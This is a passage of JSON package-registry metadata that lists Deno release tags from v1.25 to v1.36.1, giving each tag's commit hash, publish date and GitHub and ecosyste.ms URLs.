0:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25